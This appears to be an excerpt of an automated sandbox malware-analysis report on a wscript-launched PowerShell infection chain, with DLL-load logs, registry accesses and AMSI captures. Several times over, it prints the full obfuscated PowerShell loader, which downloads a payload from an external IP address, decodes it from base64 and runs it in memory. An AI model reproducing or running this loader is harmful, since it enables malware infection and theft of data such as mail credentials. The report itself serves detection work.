        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptdlg.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msoert2.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msimg32.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptui.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msftedit.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: explorerframe.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: actxprxy.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptdlg.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msoert2.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msimg32.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptui.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msftedit.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: explorerframe.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\msftedit.dllJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb(g source: powershell.exe, 00000005.00000002.2486548561.0000000008A4B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2482681439.0000000007984000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ols\dll\System.Core.pdb source: powershell.exe, 00000005.00000002.2486768538.0000000008AAA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2470735399.0000000003368000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5v source: powershell.exe, 00000005.00000002.2482681439.00000000079E1000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5V source: powershell.exe, 00000005.00000002.2482681439.00000000079E1000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb0 source: powershell.exe, 00000005.00000002.2486548561.0000000008A4B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ATBroker.pdb source: wab.exe, 00000008.00000003.2770400381.0000000006A4B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2770842443.0000000006A5B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: wab.exe, 00000008.00000003.2709190569.0000000022373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2711294298.0000000022520000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2470735399.000000000332C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: wab.exe, wab.exe, 00000008.00000003.2709190569.0000000022373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2711294298.0000000022520000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe
        Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2486548561.0000000008A20000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ATBroker.pdbGCTL source: wab.exe, 00000008.00000003.2770400381.0000000006A4B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2770842443.0000000006A5B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2470735399.000000000332C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: re.pdb source: powershell.exe, 00000005.00000002.2486768538.0000000008AAA000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute("PowerShell.exe", ""$Hovedafbryderes = 1;$Dives='Substrin'", "", "", "0");
        Source: Yara matchFile source: 00000005.00000002.2487767026.000000000A034000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.2487176127.0000000008CD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.2761711892.000001CB10070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.2478265897.0000000006060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Fremadstrbendes)$global:Bsselbets = [System.Text.Encoding]::ASCII.GetString($Philonic)$global:Laryngotome=$Bsselbets.substring(277822,26651)<#huldes Bisoner Almene Reinduce Archemper
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Dekomponer $Ackee $Overtraining), (Fotografien @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Preconfiding = [AppDomain]::CurrentDomain.GetAssemblies()$gl
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Kontroversielle)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Ventilatorens, $false).DefineType($Unenti
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Fremadstrbendes)$global:Bsselbets = [System.Text.Encoding]::ASCII.GetString($Philonic)$global:Laryngotome=$Bsselbets.substring(277822,26651)<#huldes Bisoner Almene Reinduce Archemper
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hovedafbryderes = 1;$Dives='Substrin';$Dives+='g';Function Rumper($Ninox){$Tomatillo=$Ninox.Length-$Hovedafbryderes;For($Skumle=1; $Skumle -lt $Tomatillo; $Skumle+=(2)){$Tiredly+=$Ninox.$Dives.Invoke($Skumle, $Hovedafbryderes);}$Tiredly;}function Funmaker($Fedtsyrers){. ($inclosers) ($Fedtsyrers);}$Wacky=Rumper 'BM o,z iTlnl a / 5 . 0 ( W i,n d oHw.sI UN,T 1.0P. 0S;S WNi nC6,4,;D Sx 6,4T; r,vL: 1N2I1J. 0.). VG.e.cFkCoS/ 2 0,1S0F0 1I0r1E LF,iIr.e fSo.x /R1.2L1 . 0 ';$Sials=Rumper 'TUBsNe,r -LA.gPe n tU ';$Mucormycosis=Rumper ' hRt t,pt: /./.8O7T..1 2L1...1.0i5C..1 6s3A/,S.t eSr.ePoSt,y,pLeOr iun gIe n,sB7 2 .,x,sEnL ';$lecideiform=Rumper 'G>U ';$inclosers=Rumper ' i e,xS ';$Salrs227='Revanchister';Funmaker (Rumper ',SMeOt -,C.o,nZt eSn tF -.P.aUtPh UTG:B\aDSi,b r oOm,o b e n zPe n eC.Ft,x t - VAaPl uLe $JSPa lUrKs 2 2 7T;s ');Funmaker (Rumper 'pi,f, G(,t eBs.t -RpAaDtSh. TTP:c\RD iUb,r oGmSoFbAe.nPz eSn,eE. tTx,t,) {DeWx i tD}C;, ');$Southrons = Rumper 'Te.cMhOo. ,%Ba,p,p d aKtWaD%I\HA.r g,eSaRnA.OM e nC t&s&D eHc hKo $ ';Funmaker (Rumper 'S$Cg.l.oAb,a l.:.U m oBtLi vSeSr eVd eBs =K(,ctmFdF / c ,$ S oSu tkh.rPoCn,s )U ');Funmaker (Rumper 'F$ gNl.oUbTaKl :GDse,f iTl.e.sV1 2 2S= $UMMuIcSoFrPm,y cSo,s,iUsp.As p.l i tE(,$ l eTcXiLd eGiBfFo.r mT)M ');$Mucormycosis=$Defiles122[0];Funmaker (Rumper ' $.gFl oDbSaSl : GGrRa,a,l i g sPt eE=GN.efwk-.O,b.j eCcJtW HSSy sNt e.mE.XN e,tG.DW,enbNC l,iLe.nOtF ');Funmaker (Rumper 'S$tGDrSa aRl.i.gEs.tfe...H e aAdSe.r s [ $CS.i aSlBsS]A= $HWSaLcckSy ');$Folkekongressen=Rumper 'uGpr aAaAl.i gTsHtde..aD,oSw,n l oRa.dKF,i lMeS(H$.MBuUc,oFrKmPyEcroPs,i sR,C$Sa fGm,n.sUtMrKeUnRd.ems ) ';$Folkekongressen=$Umotiveredes[1]+$Folkekongressen;$afmnstrendes=$Umotiveredes[0];Funmaker (Rumper ' $ g,l ofbHaWl :.f rSi.t nLkSeRr i =K(MTNe s tQ-KP,aSt,h T$FaTfGm nGs.tGrzeMn dSeMs )P ');while (!$fritnkeri) {Funmaker (Rumper ' $Dg.l o bEa,lP:SP.aRr kJe,rHiHn gJsFsGkUiTv e.n,=C$ t r,uRe, ') ;Funmaker $Folkekongressen;Funmaker (Rumper 'TSNtKaLrst -GSSl eFeNpG S4A ');Funmaker (Rumper 'R$SgAlBoPb.aClE:Cf.rkiTt nTk eOr iR=E(NT,eUsFtF-,P ast.hA $.aCf mPnCs t rCe nGdIe,sE)H ') ;Funmaker (Rumper ' $Ug.lMoSbHa lS: B,oDl dDgBa dSe n = $,g l.oHbFaDlU:UB,rPu,nZk uBl s,l eBj eRtB+H+K% $DDOelf,i l e.s 1P2S2 .Rc o,u nMt ') ;$Mucormycosis=$Defiles122[$Boldgaden];}Funmaker (Rumper ' $.gOlPoDb.aNl :UFVrSe,mLaDdUsWt r b e n d e,sR =B KG e tN- C.oPnZt enn.tS .$Oa,f mTnZs,t,r.eEnAdIe sS ');Funmaker (Rumper 'D$SgCl.oGbMaAlS:APShHi l o,nCi cS K=A [SS yTsTtMe.mE. CIo n.vSe,r,t,] :B: FFrSo,m B aSs.e 6,4BS tDrOiHnAg (,$SF rAeUm aFdMs t r,bAe n dKeksR)M ');Funmaker (Rumper 'E$TgJlPo bAaBl.:TBAs,sCeTlIb,e t s, .=K [ S,y.sCt e,m . T ePxIt . E n cIoDdSi,nAgO] :P:MA S C,IDIS.VG.e tHS.tRr i nMgF(c$MP hTi l,o n.i,cE) ');Funmaker (Rumper 'M$Eg,lSoPb aal :CLKaBr.y.npgRoOtRoGmFeF=R$,B,s sPeAlPbSe tRsD.Ds uQbMsTt r.iSnMgS(S2.7
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Hovedafbryderes = 1;$Dives='Substrin';$Dives+='g';Function Rumper($Ninox){$Tomatillo=$Ninox.Length-$Hovedafbryderes;For($Skumle=1; $Skumle -lt $Tomatillo; $Skumle+=(2)){$Tiredly+=$Ninox.$Dives.Invoke($Skumle, $Hovedafbryderes);}$Tiredly;}function Funmaker($Fedtsyrers){. ($inclosers) ($Fedtsyrers);}$Wacky=Rumper 'BM o,z iTlnl a / 5 . 0 ( W i,n d oHw.sI UN,T 1.0P. 0S;S WNi nC6,4,;D Sx 6,4T; r,vL: 1N2I1J. 0.). VG.e.cFkCoS/ 2 0,1S0F0 1I0r1E LF,iIr.e fSo.x /R1.2L1 . 0 ';$Sials=Rumper 'TUBsNe,r -LA.gPe n tU ';$Mucormycosis=Rumper ' hRt t,pt: /./.8O7T..1 2L1...1.0i5C..1 6s3A/,S.t eSr.ePoSt,y,pLeOr iun gIe n,sB7 2 .,x,sEnL ';$lecideiform=Rumper 'G>U ';$inclosers=Rumper ' i e,xS ';$Salrs227='Revanchister';Funmaker (Rumper ',SMeOt -,C.o,nZt eSn tF -.P.aUtPh UTG:B\aDSi,b r oOm,o b e n zPe n eC.Ft,x t - VAaPl uLe $JSPa lUrKs 2 2 7T;s ');Funmaker (Rumper 'pi,f, G(,t eBs.t -RpAaDtSh. TTP:c\RD iUb,r oGmSoFbAe.nPz eSn,eE. tTx,t,) {DeWx i tD}C;, ');$Southrons = Rumper 'Te.cMhOo. ,%Ba,p,p d aKtWaD%I\HA.r g,eSaRnA.OM e nC t&s&D eHc hKo $ ';Funmaker (Rumper 'S$Cg.l.oAb,a l.:.U m oBtLi vSeSr eVd eBs =K(,ctmFdF / c ,$ S oSu tkh.rPoCn,s )U ');Funmaker (Rumper 'F$ gNl.oUbTaKl :GDse,f iTl.e.sV1 2 2S= $UMMuIcSoFrPm,y cSo,s,iUsp.As p.l i tE(,$ l eTcXiLd eGiBfFo.r mT)M ');$Mucormycosis=$Defiles122[0];Funmaker (Rumper ' $.gFl oDbSaSl : GGrRa,a,l i g sPt eE=GN.efwk-.O,b.j eCcJtW HSSy sNt e.mE.XN e,tG.DW,enbNC l,iLe.nOtF ');Funmaker (Rumper 'S$tGDrSa aRl.i.gEs.tfe...H e aAdSe.r s [ $CS.i aSlBsS]A= $HWSaLcckSy ');$Folkekongressen=Rumper 'uGpr aAaAl.i gTsHtde..aD,oSw,n l oRa.dKF,i lMeS(H$.MBuUc,oFrKmPyEcroPs,i sR,C$Sa fGm,n.sUtMrKeUnRd.ems ) ';$Folkekongressen=$Umotiveredes[1]+$Folkekongressen;$afmnstrendes=$Umotiveredes[0];Funmaker (Rumper ' $ g,l ofbHaWl :.f rSi.t nLkSeRr i =K(MTNe s tQ-KP,aSt,h T$FaTfGm nGs.tGrzeMn dSeMs )P ');while (!$fritnkeri) {Funmaker (Rumper ' $Dg.l o bEa,lP:SP.aRr kJe,rHiHn gJsFsGkUiTv e.n,=C$ t r,uRe, ') ;Funmaker $Folkekongressen;Funmaker (Rumper 'TSNtKaLrst -GSSl eFeNpG S4A ');Funmaker (Rumper 'R$SgAlBoPb.aClE:Cf.rkiTt nTk eOr iR=E(NT,eUsFtF-,P ast.hA $.aCf mPnCs t rCe nGdIe,sE)H ') ;Funmaker (Rumper ' $Ug.lMoSbHa lS: B,oDl dDgBa dSe n = $,g l.oHbFaDlU:UB,rPu,nZk uBl s,l eBj eRtB+H+K% $DDOelf,i l e.s 1P2S2 .Rc o,u nMt ') ;$Mucormycosis=$Defiles122[$Boldgaden];}Funmaker (Rumper ' $.gOlPoDb.aNl :UFVrSe,mLaDdUsWt r b e n d e,sR =B KG e tN- C.oPnZt enn.tS .$Oa,f mTnZs,t,r.eEnAdIe sS ');Funmaker (Rumper 'D$SgCl.oGbMaAlS:APShHi l o,nCi cS K=A [SS yTsTtMe.mE. CIo n.vSe,r,t,] :B: FFrSo,m B aSs.e 6,4BS tDrOiHnAg (,$SF rAeUm aFdMs t r,bAe n dKeksR)M ');Funmaker (Rumper 'E$TgJlPo bAaBl.:TBAs,sCeTlIb,e t s, .=K [ S,y.sCt e,m . T ePxIt . E n cIoDdSi,nAgO] :P:MA S C,IDIS.VG.e tHS.tRr i nMgF(c$MP hTi l,o n.i,cE) ');Funmaker (Rumper 'M$Eg,lSoPb aal :CLKaBr.y.npgRoOtRoGmFeF=R$,B,s sPeAlPbSe tRsD.Ds uQbMsTt r.iSnMgS(S2.7
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hovedafbryderes = 1;$Dives='Substrin';$Dives+='g';Function Rumper($Ninox){$Tomatillo=$Ninox.Length-$Hovedafbryderes;For($Skumle=1; $Skumle -lt $Tomatillo; $Skumle+=(2)){$Tiredly+=$Ninox.$Dives.Invoke($Skumle, $Hovedafbryderes);}$Tiredly;}function Funmaker($Fedtsyrers){. ($inclosers) ($Fedtsyrers);}$Wacky=Rumper 'BM o,z iTlnl a / 5 . 0 ( W i,n d oHw.sI UN,T 1.0P. 0S;S WNi nC6,4,;D Sx 6,4T; r,vL: 1N2I1J. 0.). VG.e.cFkCoS/ 2 0,1S0F0 1I0r1E LF,iIr.e fSo.x /R1.2L1 . 0 ';$Sials=Rumper 'TUBsNe,r -LA.gPe n tU ';$Mucormycosis=Rumper ' hRt t,pt: /./.8O7T..1 2L1...1.0i5C..1 6s3A/,S.t eSr.ePoSt,y,pLeOr iun gIe n,sB7 2 .,x,sEnL ';$lecideiform=Rumper 'G>U ';$inclosers=Rumper ' i e,xS ';$Salrs227='Revanchister';Funmaker (Rumper ',SMeOt -,C.o,nZt eSn tF -.P.aUtPh UTG:B\aDSi,b r oOm,o b e n zPe n eC.Ft,x t - VAaPl uLe $JSPa lUrKs 2 2 7T;s ');Funmaker (Rumper 'pi,f, G(,t eBs.t -RpAaDtSh. TTP:c\RD iUb,r oGmSoFbAe.nPz eSn,eE. tTx,t,) {DeWx i tD}C;, ');$Southrons = Rumper 'Te.cMhOo. ,%Ba,p,p d aKtWaD%I\HA.r g,eSaRnA.OM e nC t&s&D eHc hKo $ ';Funmaker (Rumper 'S$Cg.l.oAb,a l.:.U m oBtLi vSeSr eVd eBs =K(,ctmFdF / c ,$ S oSu tkh.rPoCn,s )U ');Funmaker (Rumper 'F$ gNl.oUbTaKl :GDse,f iTl.e.sV1 2 2S= $UMMuIcSoFrPm,y cSo,s,iUsp.As p.l i tE(,$ l eTcXiLd eGiBfFo.r mT)M ');$Mucormycosis=$Defiles122[0];Funmaker (Rumper ' $.gFl oDbSaSl : GGrRa,a,l i g sPt eE=GN.efwk-.O,b.j eCcJtW HSSy sNt e.mE.XN e,tG.DW,enbNC l,iLe.nOtF ');Funmaker (Rumper 'S$tGDrSa aRl.i.gEs.tfe...H e aAdSe.r s [ $CS.i aSlBsS]A= $HWSaLcckSy ');$Folkekongressen=Rumper 'uGpr aAaAl.i gTsHtde..aD,oSw,n l oRa.dKF,i lMeS(H$.MBuUc,oFrKmPyEcroPs,i sR,C$Sa fGm,n.sUtMrKeUnRd.ems ) ';$Folkekongressen=$Umotiveredes[1]+$Folkekongressen;$afmnstrendes=$Umotiveredes[0];Funmaker (Rumper ' $ g,l ofbHaWl :.f rSi.t nLkSeRr i =K(MTNe s tQ-KP,aSt,h T$FaTfGm nGs.tGrzeMn dSeMs )P ');while (!$fritnkeri) {Funmaker (Rumper ' $Dg.l o bEa,lP:SP.aRr kJe,rHiHn gJsFsGkUiTv e.n,=C$ t r,uRe, ') ;Funmaker $Folkekongressen;Funmaker (Rumper 'TSNtKaLrst -GSSl eFeNpG S4A ');Funmaker (Rumper 'R$SgAlBoPb.aClE:Cf.rkiTt nTk eOr iR=E(NT,eUsFtF-,P ast.hA $.aCf mPnCs t rCe nGdIe,sE)H ') ;Funmaker (Rumper ' $Ug.lMoSbHa lS: B,oDl dDgBa dSe n = $,g l.oHbFaDlU:UB,rPu,nZk uBl s,l eBj eRtB+H+K% $DDOelf,i l e.s 1P2S2 .Rc o,u nMt ') ;$Mucormycosis=$Defiles122[$Boldgaden];}Funmaker (Rumper ' $.gOlPoDb.aNl :UFVrSe,mLaDdUsWt r b e n d e,sR =B KG e tN- C.oPnZt enn.tS .$Oa,f mTnZs,t,r.eEnAdIe sS ');Funmaker (Rumper 'D$SgCl.oGbMaAlS:APShHi l o,nCi cS K=A [SS yTsTtMe.mE. CIo n.vSe,r,t,] :B: FFrSo,m B aSs.e 6,4BS tDrOiHnAg (,$SF rAeUm aFdMs t r,bAe n dKeksR)M ');Funmaker (Rumper 'E$TgJlPo bAaBl.:TBAs,sCeTlIb,e t s, .=K [ S,y.sCt e,m . T ePxIt . E n cIoDdSi,nAgO] :P:MA S C,IDIS.VG.e tHS.tRr i nMgF(c$MP hTi l,o n.i,cE) ');Funmaker (Rumper 'M$Eg,lSoPb aal :CLKaBr.y.npgRoOtRoGmFeF=R$,B,s sPeAlPbSe tRsD.Ds uQbMsTt r.iSnMgS(S2.7Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Hovedafbryderes = 1;$Dives='Substrin';$Dives+='g';Function Rumper($Ninox){$Tomatillo=$Ninox.Length-$Hovedafbryderes;For($Skumle=1; $Skumle -lt $Tomatillo; $Skumle+=(2)){$Tiredly+=$Ninox.$Dives.Invoke($Skumle, $Hovedafbryderes);}$Tiredly;}function Funmaker($Fedtsyrers){. ($inclosers) ($Fedtsyrers);}$Wacky=Rumper 'BM o,z iTlnl a / 5 . 0 ( W i,n d oHw.sI UN,T 1.0P. 0S;S WNi nC6,4,;D Sx 6,4T; r,vL: 1N2I1J. 0.). VG.e.cFkCoS/ 2 0,1S0F0 1I0r1E LF,iIr.e fSo.x /R1.2L1 . 0 ';$Sials=Rumper 'TUBsNe,r -LA.gPe n tU ';$Mucormycosis=Rumper ' hRt t,pt: /./.8O7T..1 2L1...1.0i5C..1 6s3A/,S.t eSr.ePoSt,y,pLeOr iun gIe n,sB7 2 .,x,sEnL ';$lecideiform=Rumper 'G>U ';$inclosers=Rumper ' i e,xS ';$Salrs227='Revanchister';Funmaker (Rumper ',SMeOt -,C.o,nZt eSn tF -.P.aUtPh UTG:B\aDSi,b r oOm,o b e n zPe n eC.Ft,x t - VAaPl uLe $JSPa lUrKs 2 2 7T;s ');Funmaker (Rumper 'pi,f, G(,t eBs.t -RpAaDtSh. TTP:c\RD iUb,r oGmSoFbAe.nPz eSn,eE. tTx,t,) {DeWx i tD}C;, ');$Southrons = Rumper 'Te.cMhOo. ,%Ba,p,p d aKtWaD%I\HA.r g,eSaRnA.OM e nC t&s&D eHc hKo $ ';Funmaker (Rumper 'S$Cg.l.oAb,a l.:.U m oBtLi vSeSr eVd eBs =K(,ctmFdF / c ,$ S oSu tkh.rPoCn,s )U ');Funmaker (Rumper 'F$ gNl.oUbTaKl :GDse,f iTl.e.sV1 2 2S= $UMMuIcSoFrPm,y cSo,s,iUsp.As p.l i tE(,$ l eTcXiLd eGiBfFo.r mT)M ');$Mucormycosis=$Defiles122[0];Funmaker (Rumper ' $.gFl oDbSaSl : GGrRa,a,l i g sPt eE=GN.efwk-.O,b.j eCcJtW HSSy sNt e.mE.XN e,tG.DW,enbNC l,iLe.nOtF ');Funmaker (Rumper 'S$tGDrSa aRl.i.gEs.tfe...H e aAdSe.r s [ $CS.i aSlBsS]A= $HWSaLcckSy ');$Folkekongressen=Rumper 'uGpr aAaAl.i gTsHtde..aD,oSw,n l oRa.dKF,i lMeS(H$.MBuUc,oFrKmPyEcroPs,i sR,C$Sa fGm,n.sUtMrKeUnRd.ems ) ';$Folkekongressen=$Umotiveredes[1]+$Folkekongressen;$afmnstrendes=$Umotiveredes[0];Funmaker (Rumper ' $ g,l ofbHaWl :.f rSi.t nLkSeRr i =K(MTNe s tQ-KP,aSt,h T$FaTfGm nGs.tGrzeMn dSeMs )P ');while (!$fritnkeri) {Funmaker (Rumper ' $Dg.l o bEa,lP:SP.aRr kJe,rHiHn gJsFsGkUiTv e.n,=C$ t r,uRe, ') ;Funmaker $Folkekongressen;Funmaker (Rumper 'TSNtKaLrst -GSSl eFeNpG S4A ');Funmaker (Rumper 'R$SgAlBoPb.aClE:Cf.rkiTt nTk eOr iR=E(NT,eUsFtF-,P ast.hA $.aCf mPnCs t rCe nGdIe,sE)H ') ;Funmaker (Rumper ' $Ug.lMoSbHa lS: B,oDl dDgBa dSe n = $,g l.oHbFaDlU:UB,rPu,nZk uBl s,l eBj eRtB+H+K% $DDOelf,i l e.s 1P2S2 .Rc o,u nMt ') ;$Mucormycosis=$Defiles122[$Boldgaden];}Funmaker (Rumper ' $.gOlPoDb.aNl :UFVrSe,mLaDdUsWt r b e n d e,sR =B KG e tN- C.oPnZt enn.tS .$Oa,f mTnZs,t,r.eEnAdIe sS ');Funmaker (Rumper 'D$SgCl.oGbMaAlS:APShHi l o,nCi cS K=A [SS yTsTtMe.mE. CIo n.vSe,r,t,] :B: FFrSo,m B aSs.e 6,4BS tDrOiHnAg (,$SF 